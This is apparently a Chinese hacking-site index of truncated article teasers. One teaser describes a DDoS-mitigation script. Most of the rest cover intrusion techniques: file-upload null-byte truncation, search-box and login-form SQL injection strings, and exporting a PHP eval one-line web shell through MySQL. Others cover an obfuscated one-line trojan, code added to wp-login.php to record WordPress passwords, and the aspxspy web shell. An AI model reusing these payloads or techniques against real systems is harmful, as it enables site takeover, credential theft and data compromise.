Linux下防御/减轻DDOS攻击
互联网如同现实社会一样充满钩心斗角,网站被DDOS也成为站长最头疼的事。在没有硬防的情况下,寻找软件代替是最直接的方法,比如用iptables,但是iptables不能在自动屏蔽,只能手动屏蔽。今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。 DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过n...
upfile_pic.asp/upload_pic.asp及upfile_flash.asp/upload_flash.asp文件上传一句话
upfile_other.asp/upload_other.asp等,使用upload_wj.inc模板来进行上传的地方,一把可以通过filepath构造.asp%00这样的截断路径来上传。 但是不是一定都会成功,主要说下碰到的错误: 1.Microsoft VBScript 运行时错误800a01f4 变量未定义: 'upload' 行12 这个错误没法...
搜索型注入技术
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。 我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁...
三种后台登入框注入
以下是小菜新得 各位看管莫笑 老牛 飘过------ 废话不多说 开始 第一种注入 后台dbo 权限拿websehll 目标网站:http://bhst.edu.cn/manage/login.aspx 判断有无注入 输入” a’” 返回错误页面— 爆字表和字段 a’ having 1=1 -- a' and user>0--判断权限 看到dbo 权限我们 也部往下爆了 直接插...
另类找注入点技巧
一般的注入点像我这种菜鸟都会用以下方式 1:手工测试下 2:用明小子或者阿D直接浏览页面找注入点 3:通过搜索引擎site:xxx.com inurl:php or asp 之类的 4:safe3 jsky之类的工具抓取连接后工具自动判断~~~ 方式1缺点:只能测试部分页面拉,有点看运气的感觉 方式2缺点:基本和第一个的缺点差不多,不全面,只能浏览部分页面 方式3缺点:搜索引擎收录有限哈,有些站甚...
MSSQL读取文件 命令
这两天一直入侵一个网站 各种提权 包括 mssql:SA mysql:ROOT 主机是星外的 可以看到目标目录 数据库是ASP的 不能插马 无奈找了很多人都木有办法。。。 今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL 在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下 Use webshell.cc;--(这里是随便选的一个数据库) drop table ...
MySQL导出一句话拿WebShell的方法
文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行): Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd])...
加密一句话木马
我原也以为这是ASCII码加密过的 73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛 全部数字减13,然后十进制解密 <script> var sun=[73,50,114,133,114,112,130,129,114,45,127...
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工 原处:http://81sec.com/read.php?115 Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。 在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['p...
aspxspy的大马的查看站点做限制
先介绍一下: 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。 2.密码为32位MD5加密(小写) 默认为 admin. 3.全部采用POST方式提交数据,增强了隐蔽性。 4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。 5.增加了对指定文件的搜索功能。 6.修正了一些数据库操作的BU...